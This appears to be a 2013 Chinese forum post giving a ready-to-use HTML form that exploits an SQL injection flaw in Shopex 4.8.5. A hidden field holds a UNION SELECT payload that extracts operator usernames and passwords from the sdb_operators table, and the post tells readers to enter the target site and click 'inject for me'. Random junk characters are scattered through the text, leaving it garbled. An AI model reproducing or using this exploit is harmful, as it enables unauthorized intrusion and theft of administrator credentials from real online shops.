<center>
# L& P9 U5 X; S% _: a<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
3 r+ @( T; H B/ Z# U<form action="" method="post" name="submit_url">9 c0 k8 f- B( |
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
9 Z7 Y! V5 s- b9 j2 L( G8 ?" Q' K! o* O<input type="hidden" name="goods[goods_id]" value="3">4 C/ ~% @( ^; ]$ x9 z0 a" Z3 r
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
" o; o+ }+ ^6 F$ R6 R: K* E<input type="submit" value="给我注入" onclick=fsubmit()>
0 t8 g# S7 Q! C; S1 `& ^0 r* ^* ?! A3 B</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com/ c. ~6 |: X/ H2 n+ U1 b) v9 B9 i
3 `* _' q0 u/ ^& f) R) M
<script>
* Q6 q. J. h, k4 n* J: Z# Rfunction fsubmit(){
# N) x- b. [1 A8 V' D' cform = document.forms[0]; - Q( A# O7 H% n W# ^9 G
form.action = form.url.value+'/?product-gnotify';
: ~8 f- J7 i2 W$ X/ iform.submit(); % A4 R t1 z/ ^
} W" P6 D) M% x) h. _5 ~* D
</script>& {5 @7 l( k) o& V5 g
|
发表于 2013-1-23 09:20:52
收藏
支持
反对